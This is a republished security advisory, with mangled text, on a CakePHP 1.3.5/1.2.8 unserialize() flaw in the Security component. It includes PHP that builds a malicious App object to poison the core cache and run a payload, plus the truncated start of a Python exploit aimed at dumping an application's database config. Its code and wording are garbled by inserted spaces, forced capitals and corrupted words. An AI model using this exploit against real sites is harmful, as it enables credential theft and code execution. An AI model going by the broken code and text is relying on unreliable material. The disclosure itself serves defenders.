CakePHP & amp; lt; = 1.3.5/1.2.8 unserialize () Vulnerab

Source: Internet
Author: User

Source: http://securityreason.com/securityalert/8026

CakePHP <= 1.3.5/1.2.8 unserialize () Vulnerability

Felix | at | malloc. im

========================================================== ==========================================

====

Overview:

"CakePHP is a rapid development framework for PHP that provides

Extensible

Architecture for developing, maintaining, and deploying applications.

Using

Commonly known design patterns like MVC and ORM within the convention over

Configuration paradigm, CakePHP reduces development costs and helps

Developers

Write less code. "-cakephp.org

CakePHP is vulnerable to a file compression sion attack because of its use of

"Unserialize ()" function on unchecked user input. This makes it possible

To inject arbitary objects into the scope.

Details:

CakePHP uses the following function in the Security component

To protect against XSRF attacks with POST Requests:

Function _ validatePost (& $ controller ){

-- Snip --

$ Check = $ controller-> data;

$ Token = urldecode ($ check [_ Token] [fields]);

If (strpos ($ token ,:)){

List ($ token, $ locked) = explode (:, $ token, 2 );

}

$ Locked = unserialize (str_rot13 ($ locked ));

-- Snip --

The $ check array contains our POST data and $ locked is

A simple (rot-13 obfuscated) serialized string, which is completely

Under our control.

PHP5 introduces a destructor with the "_ destruct" method. Each object

Will execute its _ destruct method at the end of its lifetime and we can

Use this to turn an unchecked unserialize () call in an useful exploit.

(See Stefan Essers talk @

Http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf

For more information)

CakePHP defines the App Class with the following destruct method:

Function _ destruct (){

If ($ this->__ cache ){

$ Core = App: core (cake );

Unset ($ this->__ paths [rtrim ($ core [0], DS)]);

Cache: write (dir_map, array_filter ($ this->__ paths ),

_ Cake_core _);

Cache: write (file_map, array_filter ($ this->__ map ),

_ Cake_core _);

Cache: write (object_map, $ this->__ objects, _ cake_core _);

}

}

As we can see, this method can be abused by an manipulated object to write

Arbitary values into the _ cake_core Cache.

The most interesting key to upload upt is the file_map. It provides

Mapping between Classes and PHP Files and is used to load additional

Classes at runtime.

The real code for the loading of classes is a bit complicated but it all

Boils down to the following code in the _ load method inside the App

Class:

If (file_exists ($ file )){

If (! $ This-> return ){

Require ($ file );

$ This->__ loaded [$ file] = true;

}

Return true;

This means we can execute arbitary files on the local filesystem.

CakePHP uses a file based caching system in its standard configuration,

And the cache data is written in serialized form to a known location.

We can use this information to create a manipulated App object

That executes our PHP Payload:

$ X = new App ();

$ X->__ cache = 1;

$ X->__ map = array ("Core" => array ("Router"

=> "../Tmp/cache/persistent/cake_core_file_map "),

"Foo" => "<? Phpinfo (); exit ();?> ");

$ X->__ paths = array ();

$ X->__ objects = array ();

Echo serialize ($ x );

POC:

See http://malloc.im/burnedcake.py for a working POC exploit.

PoC also shown below.

Patch:

This bug was patched in Version 1.3.6 and 1.2.9

#! /Usr/bin/python

#

# BurnedCake. py-CakePHP <= 1.3.5/1.2.8 Cache resume uption Exploit

# Written by felix@malloc.im

#

# This code exploits a unserialize () vulnerability in the CakePHP security

# Component. See http://malloc.im/CakePHP-unserialize.txt for a detailed

# Analysis of the vulnerability.

#

# The exploit shocould work against every CakePHP based Application, that

# Uses POST forms with security tokens and hasnt changed the Cache

# Configuration (file-system caching is standard). Exploiting

# Other caching deployments is possible but not as elegant.

#

# This POC will output the database config file of the running CakePHP Application,

# Other payloads are easily possibe with a changed PHP Code.

From optparse import OptionParser

From urlparse import urlparse, urljoin

Import urllib2

Import urllib

Import re

Def request (url, data = "", headers ={}, debug = 0 ):

If (data = ""):

Request = urllib2.Request (url = url, headers = headers)

Else:

Request = urllib2.Request (url = url, headers = headers, data = data)

Debug_handler = urllib2.HTTPHandler (debuglevel = debug)

Opener = urllib2.build _ opener (debug_handler)

Response = opener. open (request)

Return response

If _ name __= = "_ main __":

Parser = OptionParser (usage = "usage: % prog [options] url ")

Parser. add_option ("-p", "-- post", dest = "post ",

Help = "additional post content as urlencoded string ")

Parser. add_option ("-v", action = "store_true", dest = "verbose ",

& Nb

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.